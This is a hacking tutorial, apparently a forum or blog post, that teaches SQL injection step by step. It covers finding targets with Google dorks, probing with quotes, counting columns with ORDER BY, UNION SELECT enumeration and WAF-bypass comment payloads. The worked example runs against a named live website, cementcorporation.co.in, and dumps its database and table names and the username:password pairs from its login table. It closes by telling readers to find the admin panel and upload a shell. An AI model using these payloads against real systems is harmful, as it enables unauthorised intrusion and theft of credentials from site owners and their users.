Web Hacking With Sql Injection Tutorial - FOCSoft

Assalam () Alikum
Şhâhbâz here from Cyber Comondos


We see how we create databases,tables,columns, and add record in it in different ways and now
in this article , we will be covering on SQL injections ... how we can hack using sql injection

please Comments Here if you like it .. it took my 1,1/2 hour to complete
what is sql injection???
SQL injection is a very common method of hacking websites..
well, sql injection is a big thing, newbies think that this is not a big
deal, as they can exploit this vulnerability with scripts like
sqlmap, havij , sqlninja other kiddies scripts
but SQL injection can be a huge thing that it can took many books to complete
 
So what you can DO with SQL injection
You can access records,
you can modify records
you can bypass Login areas
You can breach sql server

okay here our first step begins

Finding Vulnerable websites.
well..if you are a hacker..You must know that
search engines are your best friends...
we can find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

Now if you search anyone of these.. you will find many websites,,, open any of them
and you will see url like

www.website.com/index.php?id=1

this could be random
okay to test that if site is vulnerable, just put a ' at the end of url
and make it look like

www.website.com/index.php?id=1'

and if you see some error like this

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()

or any mysql error... etc or if you see any content of page missing
then the site is vulnerable

example



you see its mysql error..so the website is vulnerable

So now lets move to next step

EXPLOITING the vulnerability

now so we have find vulnerability website..its time to fetching secret data

so what is our next step to find the number of columns in the table

for that we replace ' with order by statement

like This

website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

we need to increase the order by number till we get some error like
unknown column numbers or we found some content missing in the page

for example,

http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE

SO NOW WE SEE THAT WE GOT ERROR AT ORDER BY 21 , BUT NO ERROR AT ORDER BY 20,
SO THAT MEANS WE HAVE 20 COLUMNS

some times this thing never works, we don't get error even at order by 1000
in that case we put ' at the end of id / parameter and put + at the end
like

http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error

now next step begins

Union Select

NOW, we know we have 20 columns, now its time to select all the columns using union select
select statement is use to view data , if you want to learn more about sql, you can check my
article on working with SQL..

we use statement like this

http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

now you will see any DIGIT of columns on page
like 1 5 7 or anyone
if you don't see, place - before parameter value
example

http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

you can see in below picture

you can see 3 and 4 on the web page .. these two are string columns..
we can retrieve our data in these columns

sometimes union select dont work due to WAF (web app firewall) ,, we add comments in our queries like
/*!union*/+/*!select*/

/*!union*/+(/*!select*/

un/**/ion+sel/**/ect+1,2,3—

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—

or change case

/*!UnIOn*//*!SeLect*/+1,2,3—


etc






now its time to retrieve data in these columns

we can retrieve sensitive data .. we can call functions for database name database(), version info version() or @@version, user info user(),
concat, group_concat(), LOAD_FILE etc and many more

oka for the tutorial, i will call version function in column 3 and db and user info in
column 4 using group_concat()...

for that i will use

http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,1 ​6,17,18,19,20--

I used 0x3a beacause its a hex value of SEMICOLON ( ; ) AND it will seprate two different values of different parameters

now u can see in the image the column 3 and 4 are now replace with values that I called



okay .. next thing

how to find all databases in the website ??

okay thats easy

now we need to replace column name with
query like this

http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--

see



now we know there are basicaly two databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema are system tables which define
databases.. we can use these tables to look at the database layout style


okay now we have our database ( we dont need to check, we can use its value actually, if we are trying to dump in current database,,, we can use
its function too.. database() instead of cementco_cement.. its needed when we are dumping in outside of current database
but in this case we will be simple dumping)

okay let now lets find the tables in current db

we will use WHERE , condtion in this query now

we will fetch tables with select statement and use where condtion to determine which database tables we want to fetch

okay
syntax

http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

now you can see we have all table names
which are

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint, ​ tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animat ​ ion,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,t ​bl_tnc,tender,tender2,tender3,tender_drawing,unit

now we gonna dump in sensitive table
which is login

okay... lets dump it

now we will replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns
and in where condtion we will change table_schema with table_name
and will give parameter of table_name = name of table in qoute like
table_name='login'
why used qoute? because its datatype is varchar ..
sometimes it does not work
so we have to covert it into mysql char ... for that i use hack bar

so now our query looks like

mysql char value of login is CHAR(108, 111, 103, 105, 110)

for exmaple

:

http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

yeahhhh..now we can see columns of table 'login'
which are ...id,username,password,email,date_added,lastlogin,sessionid,type,status



okayy...now the fun begins... time to dump the columns...
for example if we need to dump username and password columns from table 'login' we will replace the query with

select group_concat(username,0x3a,password) from login--
dumped

syntax

http://www.cementcorporation.co.in/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,​19,20 from login--

you can see username:password in the webpage

now just find admin panel and upload the shell

it was easy?? yeah.. but sometime waf can fuff your mind  

If You Want Any Kind Help, Reply Here

Please Share This Post With Your Frinds :) FOCSoft

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →